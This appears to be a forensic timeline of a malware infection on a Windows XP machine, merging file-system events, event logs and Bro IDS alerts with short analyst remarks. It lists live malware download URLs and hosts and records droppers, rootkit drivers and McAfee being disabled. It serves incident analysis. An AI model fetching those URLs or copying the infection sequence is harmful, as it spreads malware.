02/19/09 9:47:20 created prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 9:47:20 modified prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 9:47:20 written prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 9:47:28 created geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:47:28 modified geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:47:28 written geBtSIyX.dll C:\\WINDOWS\SYSTEM32\geBtSIyX.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:47:32 created ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:47:32 modified ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:47:32 written ssqQkHBq.dll C:\\WINDOWS\SYSTEM32\ssqQkHBq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 9:47:33 accessed index.dat http://www.fxopen.com History\Daily -
02/19/09 9:47:35 created fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:35 created qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:35 modified fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:35 modified qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:35 written fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:35 written qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:36 accessed fccbAQkj.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\fccbAQkj.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:36 accessed qoMfdaYs.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\qoMfdaYs.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:47:43 explorer.exe error?02/19/09 9:47:44 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: Explorer.EXE - Application Error : The instruction at "0x03cd62c8" referenced memory at "0x03cd62c8". The memory could not be "read".;;Click on OK to terminate the program;Click on CANCEL to debug the program-02/19/09 9:47:46 bro application/x-dosexec GET http://rs263cg.rapidshare.com/files/198761582/winsinstall.exe02/19/09 9:47:46 bro application/x-dosexec GET http://rs263l32.rapidshare.com/files/198761582/winsinstall.exe02/19/09 9:47:51 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: IEXPLORE.EXE - Application Error : The instruction at "0x76f2345a" referenced memory at "0x76f2345a". The memory could not be "read".;;Click on OK to terminate the program;Click on CANCEL to debug the program-02/19/09 9:50:13 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 9:50:13 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 9:50:14 created senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 9:50:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. 
-02/19/09 9:54:48 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235055278&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=19912&&&&vcw=451&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=170&lvh=&wat=1235047907&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=1&n=506267455&alid=0&u=&LRR=&L3=OHHistory\Daily -02/19/09 9:54:50 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/25667@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=20.30&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=20.30&WO3=0&WO4=83.00&Z3=43204&History\Daily -02/19/09 9:54:52 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/26299@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=20.30&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=20.30&WO3=0&WO4=83.00&Z3=43204&History\Daily -02/19/09 9:55:38 created [email protected][1].txtfc.webmasterpro.de/ Cookies -02/19/09 9:55:46 accessed prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive02/19/09 9:55:48 created rqRKEUkK.dll C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:55:48 modified rqRKEUkK.dll 
C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:55:48 written rqRKEUkK.dll C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:55:49 accessed vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:55:49 created vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:55:49 modified vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive
no=HTTP_Malware na=NOTICE_EMAIL es=node00.0 sa=164.107.xxx.177 sp=1818/tcp da=77.74.48.107 dp=80/tcp method=GET url=http://childhe.com/pas/apstpldr.dll.html?affid\=177047&uid\=&guid\=D294B3372EFC4D4CA6C6DDD12F79C20A msg=164.107.xxx.177\ ->\ 4a56334f3f65d45d90aa15c1bd2f3484\ http://childhe.com/pas/apstpldr.dll.html?affid\=177047&uid\=&guid\=D294B3372EFC4D4CA6C6DDD12F79C20A\ (hashed\ from\ the\ Team\ Cymru\ malware\ hash\ registry) sub=4a56334f3f65d45d90aa15c1bd2f3484 tag=@83-10576-5e4041
02/19/09 9:55:49 written vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 9:55:54 bro application/x-dosexec GET http://rs263gc.rapidshare.com/files/198761582/winsinstall.exe
02/19/09 9:58:18 created [email protected][1].txt 85.17.166.208/ Cookies -
02/19/09 10:00:03 created RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf
02/19/09 10:01:20 created cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:01:21 modified cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:01:21 written cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:01:23 bro application/x-dosexec
02/19/09 10:01:25 created ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:01:25 modified ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:01:25 written ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:01:26 uh-oh...
02/19/09 10:01:26 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The irzylwcf service was successfully sent a start control. -
02/19/09 10:01:26 created irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive
02/19/09 10:01:36 accessed RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf
02/19/09 10:01:36 created RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf
02/19/09 10:01:36 written RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf
02/19/09 10:01:36 modified RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf
02/19/09 10:01:41 created romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:01:41 modified romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:01:41 written romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:01:42 accessed romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:01:45 accessed ROMXWCENAS.TMP-3639D719.pf C:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf
02/19/09 10:01:45 created ROMXWCENAS.TMP-3639D719.pf C:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf
02/19/09 10:01:45 written ROMXWCENAS.TMP-3639D719.pf C:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf
02/19/09 10:01:45 modified ROMXWCENAS.TMP-3639D719.pf C:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf
02/19/09 10:01:57 accessed SXAEWRMCON.TMP-234ED43A.pf C:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf
02/19/09 10:01:57 created SXAEWRMCON.TMP-234ED43A.pf C:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf
02/19/09 10:01:57 written SXAEWRMCON.TMP-234ED43A.pf C:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf
02/19/09 10:01:57 modified SXAEWRMCON.TMP-234ED43A.pf C:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf
02/19/09 10:02:01 created swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:01 modified swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:01 written swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:04 accessed swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:04 created wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:04 modified wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:04 written wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:08 accessed SWXAOERMNC.TMP-316E61E9.pf C:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf
02/19/09 10:02:08 created SWXAOERMNC.TMP-316E61E9.pf C:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf
02/19/09 10:02:08 written SWXAOERMNC.TMP-316E61E9.pf C:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf
02/19/09 10:02:08 modified SWXAOERMNC.TMP-316E61E9.pf C:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf
02/19/09 10:02:11 created jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 10:02:11 modified jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 10:02:11 written jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 10:02:12 accessed jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to Memory File, Archive
02/19/09 10:02:12 created mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive
02/19/09 10:02:17 accessed NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed
02/19/09 10:02:17 created NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed
02/19/09 10:02:17 modified NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed
02/19/09 10:02:17 written NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed
02/19/09 10:02:26 bro application/x-dosexec GET http://thaexp.cn/ex/a.php
02/19/09 10:02:27 modified mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive
02/19/09 10:02:27 written mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive
02/19/09 10:02:29 bro application/x-dosexec GET http://77.93.75.147/db/upd105320.dll?setid=irq4&affid=177047&uid=2C211880FE9611DD818B177047CFFFFF&guid=D294B3372EFC4D4CA6C6DDD12F79C20A&rid=pfobnf
02/19/09 10:02:29 mcafee is paused...sigh
02/19/09 10:02:29 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The McAfee McShield service entered the paused state. -
02/19/09 10:02:29 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The McAfee McShield service was successfully sent a stop control. -
02/19/09 10:02:29 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The McAfee McShield service entered the stopped state. -
02/19/09 10:02:30 created VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:30 accessed gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:02:30 created gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:02:30 modified gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:02:30 written gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:02:32 accessed VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:32 modified VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:32 written VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:33 bro application/x-dosexec GET http://thaexp.cn/dll/al.txt
02/19/09 10:02:34 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2284/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/ex/a.php msg=application/x-dosexec\ GET\ http://thaexp.cn/ex/a.php tag=@83-10576-603345
02/19/09 10:02:34 bro no=HTTP_Malware na=NOTICE_EMAIL es=node00.0 sa=164.107.xxx.177 sp=2284/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/ex/a.php msg=164.107.xxx.177\ ->\ dc9f67ae1d175386625c97fcf22c77ab\ http://thaexp.cn/ex/a.php\ (hashed\ from\ the\ Team\ Cymru\ malware\ hash\ registry) sub=dc9f67ae1d175386625c97fcf22c77ab tag=@83-10576-603345
02/19/09 10:02:34 modified xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:02:34 written xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:02:34 modified xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive
02/19/09 10:02:34 written xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive
02/19/09 10:02:35 bro application/x-dosexec GET http://vipinstall.8800.org/stat/down/adx.exe
02/19/09 10:02:36 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2287/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/al.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/al.txt tag=@83-10576-60367d
02/19/09 10:02:36 accessed VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf
02/19/09 10:02:36 created VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf
02/19/09 10:02:36 written VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf
02/19/09 10:02:36 modified VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf
02/19/09 10:02:37 created 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive
02/19/09 10:02:39 created VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf
02/19/09 10:02:40 bummer...
02/19/09 10:02:40 logged SysEvent.Evt EVENT ID: 7000 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The zmzfozjg service failed to start due to the following error: %%317 -
02/19/09 10:02:44 created xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive
02/19/09 10:02:48 accessed VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf
02/19/09 10:02:48 written VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf
02/19/09 10:02:48 modified VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf
02/19/09 10:02:50 created xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:02:50 created phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:02:50 modified phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:02:50 written phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:02:51 created lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htm Web Page Document ! Bad signature File, Archive, Not Indexed
02/19/09 10:02:52 accessed lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htm Web Page Document ! Bad signature File, Archive, Not Indexed
02/19/09 10:02:52 accessed xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive
02/19/09 10:02:52 created xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive
02/19/09 10:02:52 modified 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive
02/19/09 10:02:52 written 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive
02/19/09 10:02:52 modified lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htm Web Page Document ! Bad signature File, Archive, Not Indexed
02/19/09 10:02:52 written lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htm Web Page Document ! Bad signature File, Archive, Not Indexed
02/19/09 10:02:54 accessed irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive
02/19/09 10:02:54 accessed xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:54 accessed xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:54 created xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:54 created xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:54 modified irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive
02/19/09 10:02:54 modified xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:54 modified xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:54 written irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive
02/19/09 10:02:54 written xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:54 written xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:55 another strange service fails to start...
GET http://85.17.166.133/dwn/klite9.dll?sid=C854505B4F080F0F000D54585E5E595D5E4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495A4F0A000D542D5B505D2B5A5A5E5B2C2F2A5D2D5D2A285F2A5F2D2D2D585B2F5E502A5B59284F081D545B2A5B58585151592F2C505F58582D2D5158512B585E5E595D5E2A2F2F2F2F2F4F1E1D545E585C580A5A5B5E59584F0B00545B58594F04061B1901000D54001B185D4F1B0C1F000D54585959515D69A101
02/19/09 10:02:55 logged SysEvent.Evt EVENT ID: 7000 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The aylnlfdx service failed to start due to the following error: %%317 -
02/19/09 10:02:56 created ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:02:56 modified imapi.exe C:\\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive
02/19/09 10:02:57 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:02:57 accessed AccessProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txt Text Document File, Archive
02/19/09 10:02:57 accessed BufferOverflowProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txt Text Document Match File, Archive
02/19/09 10:02:57 modified AccessProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txt Text Document File, Archive
02/19/09 10:02:57 modified BufferOverflowProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txt Text Document Match File, Archive
02/19/09 10:02:57 written AccessProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txt Text Document File, Archive
02/19/09 10:02:57 written BufferOverflowProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txt Text Document Match File, Archive
02/19/09 10:02:58 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:02:58 accessed ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:02:58 created 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:02:58 modified ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:02:58 written ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:02:58 written services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:02:59 bro application/x-dosexec GET http://thaexp.cn/met/ge.txt
02/19/09 10:02:59 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/met/ge.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/met/ge.txt tag=@83-10576-604365
02/19/09 10:02:59 created em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:02:59 modified verclsid.exe C:\\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File
